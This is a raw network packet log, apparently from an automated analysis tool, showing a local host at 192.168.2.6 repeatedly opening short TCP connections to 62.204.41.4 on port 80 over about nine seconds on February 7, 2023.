                          Feb 7, 2023 20:01:50.069849014 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.129224062 CET804992862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.129365921 CET4992880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.132771969 CET804992962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.132977009 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.134881973 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.196410894 CET804992962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.201193094 CET804992962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.201564074 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.312321901 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.313452005 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.373008013 CET804993062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.373150110 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.373765945 CET804992962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.373847961 CET4992980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.374172926 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.434653997 CET804993062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.436979055 CET804993062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.437081099 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.547549009 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.548715115 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.607203007 CET804993062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.607397079 CET4993080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.611489058 CET804993162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.611638069 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.612148046 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.674762964 CET804993162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.677005053 CET804993162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.677180052 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.800331116 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.801222086 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.860451937 CET804993262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.860682011 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.862632036 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.863384008 CET804993162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.863528967 CET4993180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:50.922038078 CET804993262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.924379110 CET804993262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:50.924542904 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.030761957 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.031996012 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.090965986 CET804993262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.093389988 CET804993362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.093561888 CET4993280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.094137907 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.094137907 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.154616117 CET804993362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.158330917 CET804993362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.158430099 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.265394926 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.265727997 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.326241016 CET804993362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.327928066 CET804993462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.328195095 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.328468084 CET4993380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.338963032 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.401392937 CET804993462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.403808117 CET804993462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.404078007 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.515799046 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.517071962 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.578141928 CET804993562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.578296900 CET804993462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.578600883 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.578600883 CET4993480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.579499960 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.639905930 CET804993562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.642149925 CET804993562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.643695116 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.757858038 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.758457899 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.818552017 CET804993562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.818747044 CET4993580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.819698095 CET804993662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.819817066 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.820245981 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.881675959 CET804993662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.883994102 CET804993662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:51.884115934 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:51.999429941 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.000720978 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.061049938 CET804993662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.061167002 CET804993762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.061326981 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.061330080 CET4993680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.063127041 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.123703957 CET804993762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.127693892 CET804993762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.127966881 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.239137888 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.240216970 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.299901009 CET804993762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.300163031 CET4993780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.303813934 CET804993862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.304091930 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.305588007 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.368098021 CET804993862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.370268106 CET804993862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.370434046 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.483648062 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.484724998 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.545207977 CET804993962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.545371056 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.546117067 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.546176910 CET804993862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.546295881 CET4993880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.606430054 CET804993962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.609177113 CET804993962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.609421968 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.719120979 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.720432043 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.779685974 CET804993962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.779881001 CET4993980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.780899048 CET804994062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.781079054 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.794804096 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.855431080 CET804994062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.857938051 CET804994062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:52.858124018 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.970439911 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:52.971609116 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.031079054 CET804994062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.031905890 CET4994080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.033257008 CET804994162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.033389091 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.041039944 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.102773905 CET804994162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.106280088 CET804994162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.106482029 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.223215103 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.224176884 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.285069942 CET804994162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.285334110 CET4994180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.286664009 CET804994262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.287894011 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.287894011 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.350487947 CET804994262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.352664948 CET804994262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.352747917 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.470928907 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.471781015 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.532181025 CET804994362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.532305956 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.532964945 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.533643007 CET804994262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.533740044 CET4994280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.593228102 CET804994362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.595475912 CET804994362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.595653057 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.729275942 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.730568886 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.789886951 CET804994362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.790004969 CET4994380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.791002989 CET804994462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.791152954 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.792361975 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.852797985 CET804994462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.854832888 CET804994462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:53.854948997 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.972160101 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:53.973395109 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.032710075 CET804994462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.035094023 CET4994480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.035660982 CET804994562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.040174961 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.040738106 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.103387117 CET804994562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.107270002 CET804994562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.107487917 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.220488071 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.221657991 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.283078909 CET804994562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.283157110 CET804994662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.283355951 CET4994580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.283444881 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.317743063 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.379719973 CET804994662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.382225990 CET804994662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.382338047 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.520009041 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.520912886 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.583626986 CET804994662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.583772898 CET804994762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.583976030 CET4994680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.584060907 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.584701061 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.647025108 CET804994762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.649368048 CET804994762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.649619102 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.766726017 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.767833948 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.827542067 CET804994762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.829132080 CET804994862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.829334021 CET4994780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.829482079 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.830001116 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.891277075 CET804994862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.893845081 CET804994862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:54.894090891 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:54.999375105 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.000612020 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.060698986 CET804994862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.060926914 CET4994880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.062021017 CET804994962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.062206030 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.074451923 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.137103081 CET804994962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.140377045 CET804994962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.140813112 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.250242949 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.251243114 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.310863018 CET804995062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.311104059 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.311995983 CET804994962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.312148094 CET4994980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.313520908 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.373115063 CET804995062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.375415087 CET804995062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.375586987 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.485743046 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.486757994 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.545445919 CET804995062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.545614004 CET4995080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.549295902 CET804995162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.549489975 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.550312996 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.612874031 CET804995162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.615092993 CET804995162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.615241051 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.730091095 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.730937958 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.790375948 CET804995262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.790653944 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.791186094 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.792660952 CET804995162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.792773008 CET4995180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.850470066 CET804995262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.854109049 CET804995262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:55.854247093 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.968916893 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:55.970017910 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.028527021 CET804995262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.028752089 CET4995280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.031543970 CET804995362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.031714916 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.032155037 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.093753099 CET804995362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.098236084 CET804995362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.098380089 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.203047991 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.204102993 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.263555050 CET804995462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.263900995 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.264684916 CET804995362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.264833927 CET4995380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.265158892 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.324650049 CET804995462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.327336073 CET804995462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.327498913 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.436805964 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.437952042 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.496287107 CET804995462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.496512890 CET4995480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.499474049 CET804995562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.499723911 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.500323057 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.561634064 CET804995562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.563816071 CET804995562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.564040899 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.673228979 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.673971891 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.734867096 CET804995562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.735014915 CET4995580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.736375093 CET804995662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.736530066 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.737292051 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.799810886 CET804995662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.802118063 CET804995662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.802215099 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.925246954 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.926232100 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.988034010 CET804995662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.988117933 CET4995680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.988764048 CET804995762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:56.988895893 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:56.989415884 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.051857948 CET804995762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.056065083 CET804995762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.056219101 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.172566891 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.173638105 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.236646891 CET804995862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.236692905 CET804995762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.236833096 CET4995780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.236854076 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.237616062 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.304018021 CET804995862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.307380915 CET804995862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.307703972 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.426920891 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.427927017 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.488353968 CET804995862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.488394022 CET804995962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.488522053 CET4995880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.488565922 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.490225077 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.550677061 CET804995962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.553457022 CET804995962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.553529978 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.659888983 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.662360907 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.720652103 CET804995962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.720798016 CET4995980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.721813917 CET804996062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.721951008 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.722505093 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.783432007 CET804996062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.785676003 CET804996062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.785820007 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.892131090 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.893170118 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.951711893 CET804996062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.951807022 CET4996080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.954997063 CET804996162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:57.955290079 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:57.956540108 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.018328905 CET804996162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.020838022 CET804996162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.021034002 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.145361900 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.146359921 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.207020044 CET804996162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.207679033 CET4996180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.208908081 CET804996262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.212119102 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.212789059 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.276725054 CET804996262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.280103922 CET804996262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.280236959 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.390671015 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.391787052 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.453303099 CET804996262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.453336954 CET804996362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.453527927 CET4996280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.453617096 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.504584074 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.566394091 CET804996362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.568939924 CET804996362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.569148064 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.696500063 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.697527885 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.758341074 CET804996362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.758729935 CET804996462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.758945942 CET4996380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.759027004 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.773796082 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.835231066 CET804996462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.838499069 CET804996462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:58.838751078 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.953633070 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:58.955063105 CET4996580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.015019894 CET804996462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.015208960 CET4996480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:59.015396118 CET804996562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:59.015542030 CET4996580192.168.2.662.204.41.4
